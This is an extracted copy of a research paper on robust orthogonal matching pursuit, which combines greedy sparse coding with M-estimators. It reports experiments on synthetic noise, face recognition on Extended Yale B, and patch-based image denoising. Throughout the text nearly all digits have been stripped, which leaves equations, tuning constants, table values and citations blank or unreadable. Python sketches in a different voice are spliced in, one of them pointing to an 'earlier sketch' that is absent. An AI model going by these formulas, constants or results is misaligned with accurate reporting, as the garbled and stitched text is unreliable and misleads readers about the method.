Generalized orthogonal matching pursuit (Wang, Kwon & Shim, ) refines OMP by selecting N_0 atoms per iteration. If the indices of the active-set columns selected in the kth iteration are denoted J_k[1], J_k[2], \ldots, J_k[N_0], then J_k[j] is defined recursively as
J_k[j] = \arg\max_{i \in \Omega \setminus \{J_k[1], \ldots, J_k[j-1]\}} |\langle r_{k-1}, d_i \rangle|, \quad 1 \le j \le N_0. ( )
The index set \{J_k[j]\}_{j=1}^{N_0} is then added to Λ_k and, as in OMP, gOMP exploits an OLS solver to update the current active set. Both OMP and gOMP obtain locally optimal solutions under the assumption of Gaussianity (normality) of the errors; if this restriction is violated (e.g., by the presence of outliers), the estimated sparse code x will most likely be biased.
CMP
The main drawback of MSE-based cost functions is their weighing nature in terms of the influence and importance assigned to the available samples. In particular, MSE considers every sample as equally important and assigns a constant weight equal to one to all inputs. Wang, Tang & Li ( ) proposed exploiting correntropy (Liu, Pokharel & Príncipe, ) instead of MSE as an alternative cost function in the greedy sparse coding framework. Essentially, the novel loss function utilizes the correntropy induced metric (CIM) to weigh samples according to a Gaussian kernel g_\sigma(t) = \exp(-t^2 / 2\sigma^2), where the kernel bandwidth \sigma modulates the norm the CIM mimics: for small \sigma, the CIM behaves similarly to the \ell_0-pseudonorm (aggressive non-linear weighing); as \sigma increases, the CIM mimics the \ell_1-norm (moderate linear weighing); and for large \sigma, the resulting cost function defaults to MSE, i.e., constant weighing for all inputs. The main conclusion is that the CIM, unlike MSE, is robust to outliers for a principled choice of \sigma. This outcome readily generalizes to non-Gaussian environments with long-tailed error distributions.
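Before moving to the robust variants, the OMP machinery just described condenses into a short NumPy sketch; this is a generic textbook implementation, not the authors' code.

```python
import numpy as np

def omp(y, D, K):
    """Orthogonal Matching Pursuit: greedy atom selection plus batch OLS refit."""
    m, n = D.shape
    residual, support = y.copy(), []
    x = np.zeros(n)
    for _ in range(K):
        lam = int(np.argmax(np.abs(D.T @ residual)))    # most correlated atom
        if lam not in support:
            support.append(lam)
        Phi = D[:, support]
        beta, *_ = np.linalg.lstsq(Phi, y, rcond=None)  # OLS update of the active set
        x[:] = 0.0
        x[support] = beta
        residual = y - Phi @ beta
    return x
```

With the synthetic y and D from the earlier sketch, x_hat = omp(y, D, K0) recovers the support reliably under mild Gaussian noise, which is precisely the assumption the robust variants below relax.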
correntropy matching pursuit (cmp) exploits the cim robustness to update the active set in the sparse coding solver. the algorithm begins in a similar fashion as omp, i.e., r =y, =∅, and k = . then, instead of the mse–based update of eq. ( ), cmp proceeds to minimize the following cim–based expression: xk = argmin x∈irn,supp(x)⊂ k lσ(y−dx) ( ) where lσ(e)= m ∑m i= σ ( −gσ(e[i])) is the simplified version (without constant terms independent of e) of the cim loss function and e[i] is the ith entry of the vector e. the half–quadratic (hq) technique is utilized to efficiently optimize the invex cim cost function (geman & yang, ; nikolova & ng, ). the result is a local minimum of eq. ( ) alongside a weight vector w that indicates the importance of the components of the observation vector y: w(t+ )[i]=gσ(y[i]−(dx (t))[i]), i= , ,...,m ( ) where t is the iteration in the hq subroutine. in short, the hq optimization performs block coordinate descent to separately optimize the sparse code, x, and the weight vector, loza ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. w, in order to find local optima. the hyperparameter σ is iteratively updated without manual selection according to the following heuristic: σ (t+ ) = ( m ∥∥∥y−dx(t+ )∥∥∥ ) / . ( ) in wang, tang & li ( ), the authors thoroughly illustrate the advantage of cmp over many mse–based variants of omp when dealing with non-gaussian error distributions and outliers in computer vision applications. and even though they mention the improved performance of the algorithm when σ is iteratively updated versus manual selection scenarios, they fail to explain the particular heuristic behind eq. ( ) or its statistical validity. in addition, the hq optimization technique is succinctly reduced to a weighted least squares problem than can be solved explicitly. therefore, more principled techniques that exploit weighted least squares and robust estimators for linear regression can readily provide the needed statistical validity, while at the same time, generalize the concepts of cmp under the umbrella of m–estimators. robust orthogonal matching pursuit mse–based omp appeals to ols solvers to optimize eq. ( ). in particular, let ∈ irm×k correspond to the active atoms in the dictionary d at iteration k, i.e., =[d k[ ],d k[ ],...,d k[k]], and β∈ ir k be the vector corresponding to the coefficients that solve the following regression problem: y= β+e ( ) where e is an error vector with independent components identically distributed according to a zero–mean normal density (e[i]∼n( ,σ )). then, the least squares regression estimator, β̂, is the maximum likelihood estimator for β under a gaussian density prior, i.e.: β̂=argmax β m∏ i= √ πσ exp ( − e[i] σ ) =argmax β m∏ i= √ πσ exp ( − (y[i]−( β)[i]) σ ) ( ) which is equivalent to maximizing the logarithm of eq. ( ) over β: β̂=argmax β m∑ i= ( − ln( πσ )− e[i] σ ) =argmin β m∑ i= ( e[i] ) . ( ) since σ is assumed as constant, β̂ is the estimator that minimizes the sum of squares of the errors, or residuals. hence, the optimal solution is derived by classic optimization theory giving rise to the well known normal equations and ols estimator: m∑ i= e[i] =et e =(y− β)t (y− β) loza ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. =yt y−yt β−βt t y+βt t β. at the minimum: δ δβ m∑ i= e[i] = = δ δβ (yt y−yt β−βt t y+βt t β) = − t y− t y+ ( t )β. 
consequently when t is non–singular, the optimal estimated coefficients vector has a closed–form solution equal to: β̂ols= β̂=( t )− t y ( ) which is optimal under a gaussian distribution of the errors. if such assumption is no longer valid due to outliers or non–gaussian environments, m–estimators provide a suitable alternative to the estimation problem. m–estimators if the errors are not normally distributed, the estimator of eq. ( ) will be suboptimal. hence, a different function is utilized to model the statistical properties of the errors. following the same premises of independence and equivalence of the optimum under the log–transform, the following estimator arises: β̂m−est =argmin β m∑ i= ρ (e[i] s ) =argmin β m∑ i= ρ ((y[i]−( β)[i]) s ) ( ) where ρ(e) is a continuous, symmetric function (also known as the objective function) with a unique minimum at e= (andersen, ). clearly, ρ(e) reduces to half the sum of squared errors for the gaussian case. s is an estimate of the scale of the errors in order to guarantee scale–invariance of the solution. the usual standard deviation cannot be used for s due to its non–robustness; thus, a suitable alternative is usually the ‘‘re–scaled mad’’: s= . ×mad ( ) where the mad (median absolute deviation) is highly resistant to outliers with a breakdown point (bdp) of %, as it is based on the median of the errors (ẽ) rather than their mean (andersen, ): mad=median|e[i]− ẽ|. ( ) the re–scaling factor of . guarantees that, for large sample sizes and e[i]∼n( ,σ ), s reduces to the population standard deviation (hogg, ). m–estimation then, likewise ols, finds the optimal coefficients vector via partial differentiation of eq. ( ) with respect to each of the k parameters in question, resulting in a system of k equations: m∑ i= ijψ (y[i]−φti β s ) = m∑ i= ijψ (e[i] s ) = , j= , ,...,k ( ) loza ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. where φi represents the ith row of the matrix while ij accesses the jth component of the ith row of .ψ ( e[i] s ) = ∂ρ ∂ e[i] s is known as the score function while the weight function is derived from it as: w[i]=w (e[i] s ) = ψ ( e[i] s ) e[i] s . ( ) substituting eqs. ( ) into ( ) results in: m∑ i= ijw[i] e[i] s = m∑ i= ijw[i](y[i]−φ t i β) s = j= , ,...,k m∑ i= ijw[i](y[i]−φ t i β) s = j= , ,...,k m∑ i= ijw[i]φiβ= m∑ i= ijw[i]y[i] j= , ,...,k ( ) which can be succinctly reduced in matrix form as: t w β= t wy ( ) by defining the weight matrix, w, as a square diagonal matrix with non–zero elements equal to the entries in w, i.e.: w=diag({w[i] : i= , ,...,m}). lastly, if t w is well- conditioned, the closed form solution of the robust m–estimator is equal to: β̂m−est =( t w )− t wy. ( ) equation ( ) resembles its ols counterpart (eq. ( )), except for the addition of the matrix w that weights the entries of the observation vector and mitigates the effect of outliers according to a linear fit. a wide variety of objective functions (and in turn, weight functions) have been proposed in the literature (for a thorough review, see zhang ( )). for the present study, we will focus on five different variants that are detailed in table . every m–estimator weighs its entries according to a symmetric, decaying function that assigns large weights to errors in the vicinity of zero and small coefficients to gross contributions. consequently, the estimators downplay the effect of outliers and samples, in general, that deviate from the main mode of the residuals. 
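To make the estimator concrete, here is a minimal sketch of the re-scaled MAD scale estimate and one common objective function (Huber's ρ). The re-scaling constant 1.4826 and the tuning constant c are the values usually quoted in the robust-statistics literature, stated here as assumptions because the corresponding numbers are illegible in this copy.

```python
import numpy as np

def rescaled_mad(e):
    """Robust scale s = 1.4826 * median(|e - median(e)|); the factor makes s
    consistent with the standard deviation for large Gaussian samples."""
    return 1.4826 * np.median(np.abs(e - np.median(e)))

def huber_rho(e, s, c=1.345):
    """Huber objective: quadratic near zero, linear beyond |e/s| > c, so gross
    errors contribute far less than under the squared loss."""
    u = np.abs(e / s)
    return np.where(u <= c, 0.5 * u ** 2, c * u - 0.5 * c ** 2)
```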
solving the m-estimation problem is not as straightforward as the ols counterpart. in particular, eq. ( ) assumes the optimal w is readily available, which, in turn, depends on the residuals, which, again, depends on the coefficient vector. in short, the optimization problem for m–estimators can be posed as finding both β̂m−est and ŵm−est that minimize eq. ( ). likewise half–quadratic, the common approach is to perform block coordinate descent on the cost function with respect to each variable individually until local optima are found. in the robust regression literature, this optimization procedure is the well known iteratively reweighted least squares or irls (andersen, ). the procedure is detailed in algorithm . in particular, the routine runs for either a fixed number of iterations or until the estimates change by less than a selected threshold between iterations. the loza ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table comparison between ols estimator and m–estimators. objective ρ(e) and weight w(e) func- tions of ols solution and five different m–estimators. for m–estimators, error entries are standardized, i.e. divided by the scale estimator, s. each robust variant comes with a hyperparameter c. exemplary plots in the last column utilize the optimal hyperparameters detailed in table . type ρ(e) w(e) w(e) ols e cauchy c log( +( e c ) ) +(e/c) fair c ( |e| c −log ( + |e|c )) +|e|/c huber{if |e|≤c if |e|≥c {e c ( |e|− c ) { c |e| tukey{ if |e|≤c if |e|>c {c ( − ( − (e c ) ) ) c {( −( e c ) ) welsch c ( −exp(−( e c ) )) exp(−( ec ) ) main hyperparameter is the choice of the robust m–estimator alongside its corresponding parameter c. however, it is conventional to select the value that provides a % asymptotic efficiency on the standard normal distribution (zhang, ). throughout this work, we exploit such optimal values to avoid parameter tuning by the user (see table ). in this way, the influence of outliers and non-gaussian errors are expected to be diminished in the omp update stage of the coefficients corresponding to the active set. m–estimators–based omp here, we combine the ideas behind greedy approximations to the sparse coding problem and robust m–estimators; the result is robomp or robust orthogonal matching pursuit. we propose five variants based on five different m–estimators (table ). we refer to loza ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table optimal hyperparameter c of m–estimators according to a % asymptotic efficiency on the standard normal distribution. cauchy fair huber tukey welsch . . . . . algorithm irls–based m–estimation : function irls(y∈irm, ∈irm×k,wc(u)) fweight function w(u) with hyperparameter c : t ← : β( )=βols←( t )− t y fols initialization : e( )←y− β( ) : mad←median|e( )[i]− ẽ( )| : s( )← . ×mad : w( )[i]←wc ( e( )[i] s( ) ) i= , ,...,m f initial weight vector : w( )←diag ( w( ) ) : t ← : while no convergence do : β(t)←( t w(t− ) )− t w(t− )y fblock coordinate descent : e(t)←y− β(t) : mad←median|e(t)[i]− ẽ(t)| : s(t)← . ×mad : w(t)[i]←wc ( e(t)[i] s(t) ) i= , ,...,m fblock coordinate descent : w(t)←diag ( w(t) ) : t ← t+ : return β̂m–est←β(t) ŵm–est←w(t) ffinal estimates each robomp alternative according to its underlaying m–estimator; for instance, fair– estimator–based–omp is simply referred to as fair. 
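The IRLS routine sketched in Algorithm 1 reduces to a few lines once a weight function and the scale estimator are fixed. The sketch below is a generic IRLS implementation under those definitions, with Tukey's bisquare shown as an example weight function and its commonly quoted 95%-efficiency constant assumed from the literature; it is an illustration, not a transcription of the authors' implementation.

```python
import numpy as np

def tukey_weights(e, s, c=4.685):
    """Tukey bisquare weights: w(u) = (1 - (u/c)^2)^2 for |u| <= c, else 0."""
    u = e / s
    w = (1.0 - (u / c) ** 2) ** 2
    w[np.abs(u) > c] = 0.0
    return w

def irls(y, Phi, weight_fn=tukey_weights, n_iters=20, tol=1e-6):
    """Iteratively Reweighted Least Squares for an M-estimator (Algorithm 1 sketch)."""
    beta, *_ = np.linalg.lstsq(Phi, y, rcond=None)         # OLS initialisation
    w = np.ones(len(y))
    for _ in range(n_iters):
        e = y - Phi @ beta
        s = max(1.4826 * np.median(np.abs(e - np.median(e))), 1e-12)  # re-scaled MAD
        w = weight_fn(e, s)
        WPhi = Phi * w[:, None]                            # implicit diag(w) @ Phi
        beta_new = np.linalg.solve(Phi.T @ WPhi + 1e-10 * np.eye(Phi.shape[1]),
                                   Phi.T @ (w * y))
        if np.linalg.norm(beta_new - beta) < tol:          # coordinate descent converged
            beta = beta_new
            break
        beta = beta_new
    return beta, w
```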
as with omp, the only hyperparameter is the stopping criterion: either k as the maximum number of iterations (i.e., sparseness of the solution), or �, defined as a threshold on the error norm. for completeness, algorithm details the robomp routine for the case of set maximum number of iterations (the case involving � is straightforward). three major differences are noted with respect to omp: . the robust m–estimator–based update stage of the active set is performed via irls, . the updated residuals are computed considering the weight vector ŵk from irls, and . the weight vector constitutes an additional output of robomp. the last two differences are key for convergence and interpretability, respectively. the former guarantees shrinkage of the weighted error in its first and second moments, while the latter provides an intuitive, bounded, m–dimensional vector capable of discriminating between samples from the main mode and potential outliers at the tails of the density. loza ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm robomp : function robomp(y∈irm,d∈irm×n,wc(u),k) : k← f initializations : r ←y : ←∅ : while k <k do : λk =argmaxi∈�|〈rk− ,di〉| �={ , ,···,n} : k = k− ∪{λk} : =[d k[ ],d k[ ],···,d k[k]] : {β̂m–est,ŵk}←irls(y, ,wc(u)) frobust linear fit : xk[ k[i]]← β̂m–est[i] i= , ,...,k fupdate active set : rk[i]←ŵk[i]×(y[i]−(dxk)[i]) i= , ,...,m fupdate residual : k←k+ : return xrobomp←xk,w←ŵk ffinal estimates results this section evaluates the performance of the proposed methods in three different settings. first, sparse coding on synthetic data is evaluated under different noise scenarios. then, we present an image recognition framework fully–based on sparse decompositions using a well known digital image database. lastly, a denoising mechanism that exploits local sparse coding highlights the potential of the proposed techniques. sparse coding with synthetic data the dictionary or observation matrix, d∈ir × , is generated with independent entries drawn from a zero–mean gaussian random variable with variance equal to one. the ideal sparse code, x ∈ ir , is generated by randomly selecting ten entries and assigning them independent samples from a zero–mean, unit–variance gaussian distribution. the rest of the components are set equal to zero, i.e., k = . the resulting observation vector y∈ ir is computed as the linear combination of the dictionary with weights from the ideal sparse code plus a noise component n∈ir : y=dx +n. ( ) the first set of experiments considers different noise distributions. in particular, five noise cases are analyzed: gaussian (n( , )), laplacian with variance equal to , student’s t–distribution with degrees of freedom, chi–squared noise with degree of freedom, and exponential with parameter λ= . then, omp, gomp, cmp, and the variants of robomp estimate the sparse code with parameter k = . for the active set update stage of cmp and robomp, the maximum allowed number of hq/irls iterations is set to . for gomp, n ∈{ , , , } where the best results are presented. the performance measure is defined as the normalized ` –norm of the difference between the ground truth sparse code, x , and its estimate. the average results for independent runs are summarized in table . as expected, most of the algorithms loza ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table average norm of sparse code errors of mse–based omps and robust alternatives for different types of noise. 
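Putting the pieces together, the RobOMP routine is the OMP loop with the OLS refit swapped for IRLS and the residual damped by the learned weight vector. The following is a minimal sketch under the same assumptions; it reuses the irls and tukey_weights helpers sketched above, and the names and defaults are mine.

```python
import numpy as np

def robomp(y, D, K, weight_fn=tukey_weights):
    """RobOMP sketch: greedy atom selection, IRLS refit of the active set,
    and weighted residual update."""
    m, n = D.shape
    x, support = np.zeros(n), []
    residual, w = y.copy(), np.ones(m)
    for _ in range(K):
        lam = int(np.argmax(np.abs(D.T @ residual)))       # most correlated atom
        if lam not in support:
            support.append(lam)
        beta, w = irls(y, D[:, support], weight_fn)        # robust linear fit
        x[:] = 0.0
        x[support] = beta
        residual = w * (y - D @ x)                         # weight vector damps outliers
    return x, w
```

In line with the experiments reported below, replacing omp with robomp on the synthetic model typically leaves the estimated support unchanged under Gaussian noise while degrading far more gracefully when entries of y are zeroed out or hit by impulsive noise.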
best results are marked bold. k =k = . noise gaussian laplacian student chi–squared exponential omp . . . . . gomp . . . . . cmp . . . . . cauchy . . . . . fair . . . . . huber . . . . . tukey . . . . . welsch . . . . . perform similar under gaussian noise, which highlights the adaptive nature of cmp and robomp. for the non–gaussian cases, cmp and tukey are major improvements over ordinary omp. the rest of the robomp flavors consistently outperform the state of the art omp and gomp techniques. this confirms the optimality of mse–based greedy sparse decompositions when the errors are normally distributed; yet, they degrade their performance when such assumption is violated. the second set of results deals with non–linear additive noise or instance–based degradation. once again, d and x are generated following the same procedure of the previous set of results (k = ). yet now, noise is introduced by means of zeroing randomly selected entries in y. the number of missing samples is modulated by a rate parameter ranging from to . . figure summarizes the average results for k = and independent runs. as expected, the performance degrades when the rate of missing entries increases. however, the five variants of robomp are consistently superior than omp and gomp until the . –mark. beyond that point, some variants degrade at a faster rate. also, cmp achieves small sparse code error norms for low missing entries rate; however, beyond the . –mark, cmp seems to perform worse than omp and even gomp. this experiment highlights the superiority of robomp over mse–based and correntropy–based methods. now, the effect of the hyperparameter k is studied. once again, independent runs are averaged to estimate the performance measure. the rate of missing entries is fixed to . while k is the free variable. figure shows how the average error norm is a non–increasing function of k for the non–mse–based variants of omp (slight deviation in some cases beyond k = might be due to estimation uncertainty and restricted sample size). on the other hand, both omp and gomp seem to stabilize after a certain number of iterations, resulting in redundant runs of the algorithm. these outcomes imply that robomp is not only a robust sparse code estimator, but also a statistically efficient one that exploits the available information in the data in a principled manner. it is also worth noting that cmp underperforms when compared to most flavors of robomp. impulsive noise is the other extreme of instance–based contamination. namely, a rate of entries in y are affected by aggressive high–variance noise while the rest of the elements are left intact. the average performance measure of independent runs is reported for loza ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . . . . . . . . . . rate of missing entries . . . n o rm o f s p a rs e c o d e e rr o r omp gomp cmp cauchy fair huber tukey welsch figure average normalized norm of sparse code error of mse–based omps and robust alternatives for several rates of missing entries in the observation vector. all algorithms use the ground truth sparsity parameter k =k = . full-size doi: . /peerjcs. /fig- k . . . n o rm o f s p a rs e c o d e e rr o r omp gomp cmp cauchy fair huber tukey welsch figure average normalized norm of sparse code error of mse–based omps and robust alternatives over k (number of iterations) for a . rate of missing entries in the observation vector. k = . full-size doi: . /peerjcs. /fig- k =k = . 
figure a details the results for varying rates of entries affected by − db impulsive noise. again, robomp and cmp outperform omp and gomp throughout the entire experiment. tukey and welsch seem to handle this type of noise more effectively; specifically, the error associated to the algorithms in question seem to be logarithmic or radical for omp and gomp, linear for fair, cauchy, huber and cmp, and polynomial for tukey and welsch with respect to the percentage of noisy samples. on the other hand, figure b reflects the result of fixing the rate of affected entries to . and modulating the variance of the impulsive noise in the range [− , ]. robomp and cmp again outperform mse–based methods (effect visually diminished due to log–transform of the performance measure for plotting purposes). for this case, cmp is only superior to the fair version of robomp. in summary, the experiments concerning sparse coding with synthetic data confirm the robustness of the proposed robomp algorithms. non–gaussian errors, missing samples loza ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure average normalized norm of sparse code error of mse–based omps and robust alternatives for cases involving impulsive noise in the observation vector. (a) performance measure for several rates of noisy entries (− db) in the observation vector. (b) log–performance measure for several noise levels in the observation vector (fixed . rate). all algorithms use the ground truth sparsity parameter k =k = . full-size doi: . /peerjcs. /fig- and impulsive noise are handled in a principled scheme by all the robomp variants and, for most cases, the results outperform the correntropy–based cmp. tukey seems to be the more robust alternative that is able to deal with a wide spectrum of outliers in a consistent, efficient manner. robomp–based classifier we introduce a novel robust variant for sparse representation–based classifiers (src) fully based on robomp. let ai=[ai ,a i ,...,a i ni]∈ir m×ni be a matrix with ni examples from the ith class for i= , ,...,n . then, denote the set n={ , ,...,n} and the dictionary matrix of all training samples a=[a ,a ,...,an]∈ irm×n where n= ∑n i= ni is the number of training examples from all n classes. lastly, for each class i, the characteristic function δi :irn→irn extracts the coefficients associated with the ith label. the goal of the proposed classifier is to assign a class to a test sample y∈irm given the generative ‘‘labeled’’ dictionary a. the classification scheme proceeds as follows: n different sparse codes are estimated via algorithm given the subdictionaries ai for i= , ,...,n . the class–dependent residuals, ri(y) are computed and the test example is assigned to the class with minimal residual norm. to avoid biased solutions based on the scale of the data, the columns of a are set to have unit–` –norm. the result is a robust sparse representation–based classifier or rsrc, which is detailed in algorithm . similar algorithms can be deployed for omp, gomp and cmp (wang, tang & li, ). in particular, the original src (wright et al., ) exploits a ` –minimization approach to the sparse coding problem; however the fidelity term is still mse, which is sensitive to outliers. in this section we opt for greedy approaches to estimate the sparse representation. 
moreover for robomp, the major difference is the computation of the residual—we utilize the weight vector to downplay the influence of potential outlier components and, hence, reduce the norm of the errors under the proper dictionary. cmp utilizes a similar approach, but the weight matrix is further modified due to the hq implementation (see wang, tang & li ( ) for details). we compare the src variants under two different types of noise on the extended yale b database. loza ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. algorithm rsrc inputs: normalized matrix of training samples a=[a ,a ,...,an]∈irm×n test example, y∈irm m–estimator weight function, wc(u) stopping criterion for robomp, k output: class(y) : (xrobomp,w)←robomp(y,a,wc(u),k) fcompute robust sparse code and weight vector : ri(y)=||diag(w)(y−aiδi(xrobomp))|| , i∈n fcalculate norm of class–dependent residuals : class(y)←argmini∈n r i(y) fpredict label extended yale b database this dataset contains over , facial images of subjects under different lighting settings (lee, ho & kriegman, ). for each subject, a maximum of frontal– face images are provided alongside light source angles. the original dimensionality of the images is × or , in vector form. the database can be found at http://vision.ucsd.edu/~iskwak/extyaledatabase/extyaleb.html. due to the difference in lighting conditions, the database is usually segmented into subsets (wright et al., ). let θ= √ a +e where a and e are the azimuth and elevation angles of the single light source, respectively. the first subset comprises the interval ≤θ ≤ , the second one, ≤θ ≤ , the third one, ≤θ ≤ , the fourth one, ≤θ ≤ , and lastly, the fifth subset includes images with θ ≥ . in this way, the subsets increase in complexity and variability, making the classifier job more challenging, e.g., subset one includes the cleanest possible examples, while the fifth dataset presents aggressive occlusions in the form of shadows. the cardinality of the five subsets are (per subject): , , , , and images. for all the following experiments, the dictionary matrix a is built from the samples corresponding to subsets and , while the test examples belong to the third subset. this latter collection is further affected by two kinds of non–linearly additive noise. occlusions and missing pixels two different types of noise are simulated: blocks of salt and pepper noise, i.e., occlusions, and random missing pixels. in all the following experiments, the sparsity parameter for learning the sparse code is set to k = (for gomp, n ∈{ , } and the best results are presented). also, different independent runs are simulated for each noise scenario. for the occlusion blocks, a rate of affected pixels is selected beforehand in the range [ , . ]. then, as in the original src (wright et al., ), we downsampled the inputs mainly for computational reasons. in particular, we utilized factors of / , / , / , and / resulting in feature dimensions of , , , and , respectively. next, every test example is affected by blocks of salt and pepper noise (random pixels set to either or ). the location of the block is random and its size is determined by the rate parameter. every sample is assigned a label according to src variants based on omp and gomp, cmp–based classifier (coined as cmpc by wang, tang & li ( )), and our proposed loza ( ), peerj comput. sci., doi . /peerj-cs. 
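The weighted class residual just described yields a compact classifier sketch; class_slices (mapping each label to its columns of A) is an illustrative stand-in for the characteristic function δ_i, and robomp is the routine sketched earlier, so this is a plausible rendering rather than the reference implementation.

```python
import numpy as np

def rsrc_predict(y, A, class_slices, K, weight_fn):
    """Robust SRC: robust sparse code over the full dictionary, then pick the
    class whose atoms explain y with the smallest weighted residual."""
    x, w = robomp(y, A, K, weight_fn)
    best_class, best_res = None, np.inf
    for label, cols in class_slices.items():       # e.g. {0: slice(0, 32), 1: slice(32, 64)}
        delta_x = np.zeros_like(x)
        delta_x[cols] = x[cols]                    # keep only this class's coefficients
        r = np.linalg.norm(w * (y - A @ delta_x))  # weighted class-dependent residual
        if r < best_res:
            best_class, best_res = label, r
    return best_class
```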
/ https://peerj.com http://vision.ucsd.edu/~iskwak/extyaledatabase/extyaleb.html http://dx.doi.org/ . /peerj-cs. . . . . . oclussion rate . . . . c la ss ifi ca tio n a cc u ra cy omp gomp cmp cauchy fair huber tukey welsch figure average classification accuracy on the extended yale b database over occlusion rate of blocks of salt and pepper noise. feature dimension= . k = . full-size doi: . /peerjcs. /fig- rsrc. for simplicity, we use the same terminology as before when it comes to the different classifiers. the performance metric is the average classification accuracy in the range [ , ]. figure highlights the superiority of rsrc over omp and gomp. particularly, huber, tukey and welsch are consistently better than cmp while fair and cauchy seem to plateau after the . –mark. next, the effects of the feature dimension and the sparsity parameter are investigated. figure confirms the robustness of the proposed discriminative framework. as expected, when the feature dimension increases, the classification accuracy increases accordingly. however, the baselines set by omp and gomp are extremely low for some cases. on the other hand, cmp and rsrc outperform both mse–based approaches, and even more, the novel m–estimator–based classifiers surpass their correntropy–based counterpart. when it comes to the sparsity parameter, k , it is remarkable how omp and gomp do not improve their measures after the first iteration. this is expected due to the lack of principled schemes to deal with outliers. in contrast, rscr shows a non–decreasing relation between classification accuracy and k , which implies progressive refinement of the sparse code over iterations. to make these last two findings more evident, table illustrates the classification accuracy for a very extreme case: . rate of occlusion and feature dimension equal to , i.e., each input image is roughly × pixels in size (the downsampling operator introduces rounding errors in the final dimensionality). this scenario is very challenging and, yet, most of rsrc variants achieve stability and high classification after only four iterations. on the other hand, omp and gomp degrade their performance over iterations. this confirms the robust and sparse nature of the proposed framework. for the missing pixels case, a rate of affected pixels is selected beforehand in the range [ , ]. then, every test example is affected by randomly selected missing pixels—the chosen elements are replaced by samples drawn from a uniform distribution over the range [ ,ymax]where ymax is the largest possible intensity of the image in question. figures and summarize similar experiments as in the occlusion case. again, the rsrc are superior than mse–based methods and consistently increase the performance measure as the sparsity loza ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure average classification accuracy on the extended yale b database for two cases concerning blocks of salt and pepper noise at a fixed rate of . . (a) classification accuracy over feature dimension. k = . (b) classification accuracy over sparsity parameter. feature dimension= , . full-size doi: . /peerjcs. /fig- table average classification accuracy on the extended yale b database over k for a fixed rate of . pixels affected by blocks of salt and pepper noise. best result for each classifier is marked bold. feature dimension = . k omp gomp cmp cauchy fair huber tukey welsch . . . . . . . . . . . . . . . . . . . . . . . . 
the extreme case here involves a high rate of affected pixels and a small feature dimension; the corresponding table reinforces the notion that robust methods achieve higher classification accuracy even in challenging scenarios. lastly, it is worth noting that cmp performs better in the missing pixels case; yet, it fails to surpass the welsch variant of rsrc, which is its equivalent in terms of the weight function applied to the errors. once again, tukey is the algorithm with the overall best results, able to handle both kinds of noise distributions in a more principled manner.

(figure: average classification accuracy on the extended yale b database over the missing pixels rate, at fixed feature dimension and k.)
(figure: average classification accuracy on the extended yale b database for two cases concerning missing pixels at a fixed rate: (a) classification accuracy over feature dimension, at fixed k; (b) classification accuracy over sparsity parameter, at fixed feature dimension.)
(table: average classification accuracy on the extended yale b database over k for a fixed rate of missing pixels, at a fixed feature dimension; the best result for each classifier is marked bold.)

image denoising via robust, sparse and redundant representations
the last set of results introduces a preliminary analysis of image denoising exploiting sparse and redundant representations over overcomplete dictionaries. the approach is based on the seminal paper by elad & aharon ( ). essentially, zero-mean white and homogeneous gaussian additive noise with variance σ² is removed from a given image via sparse modeling. a global image prior that imposes sparsity over patches in every location of the image simplifies the sparse modeling framework and facilitates its implementation via parallel processing. in particular, if the unknown image z can be devised as the spatial (and possibly overlapping) superposition of patches that can be effectively sparsely represented given a dictionary d, then the optimal sparse codes, x̂_ij, and the estimated denoised image, ẑ, are equal to:

{x̂_ij, ẑ} = argmin_{x_ij, z}  λ‖z − y‖₂² + ∑_ij μ_ij ‖x_ij‖₀ + ∑_ij ‖d x_ij − r_ij z‖₂²

where the first term is the log-likelihood component that enforces close resemblance (or proximity in an ℓ₂ sense) between the measured noisy image, y, and its denoised (and unknown) counterpart z. the second and third terms are image priors enforcing that every patch, z_ij = r_ij z, of size √n × √n, in every location of the constructed image z, has a sparse representation with bounded error. λ and μ_ij are regularization parameters that can easily be reformulated as constraints.

block coordinate descent is exploited to solve the minimization above. in particular, x̂_ij is estimated via greedy approximations of the sparse code of each local block or patch. the authors suggest omp with the stopping criterion ‖d x_ij − r_ij z‖₂² ≤ (cσ)² for all {ij} combinations (a sequential sweep of the image extracting all possible √n × √n blocks). then, the estimated denoised image has the following closed-form solution:

ẑ = (λ i + ∑_ij r_ijᵀ r_ij)⁻¹ (λ y + ∑_ij r_ijᵀ d x̂_ij)

where i is the identity matrix.
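the two steps above (a greedy sparse code per patch, followed by the closed-form weighted average) lend themselves to a compact implementation. the following is a minimal sketch, not the authors' released code: the dictionary d, the noise level sigma, the constants lam and c, and a sparse-coding routine sparse_code (ordinary omp or any of its robust variants) are all assumed to be supplied by the caller.

```python
import numpy as np

def denoise_patchwise(y, D, sparse_code, sigma, lam, C, patch=8):
    """patch-based denoising sketch: sparse-code every overlapping patch of the
    noisy image y over the dictionary D, then average the reconstructions back,
    with lam weighting the contribution of the noisy image itself."""
    h, w = y.shape
    n = patch * patch
    num = lam * y.astype(float)            # accumulates lam*y + sum_ij r_ij^T d x_ij
    den = lam * np.ones_like(num)          # accumulates lam*i + sum_ij r_ij^T r_ij (diagonal)
    tol = (C * sigma) ** 2                 # per-patch stopping criterion (c*sigma)^2
    for i in range(h - patch + 1):
        for j in range(w - patch + 1):
            block = y[i:i + patch, j:j + patch].reshape(n)   # noisy patch r_ij y
            x = sparse_code(D, block, tol)                   # greedy sparse code of the patch
            rec = (D @ x).reshape(patch, patch)              # reconstruction d x_ij
            num[i:i + patch, j:j + patch] += rec
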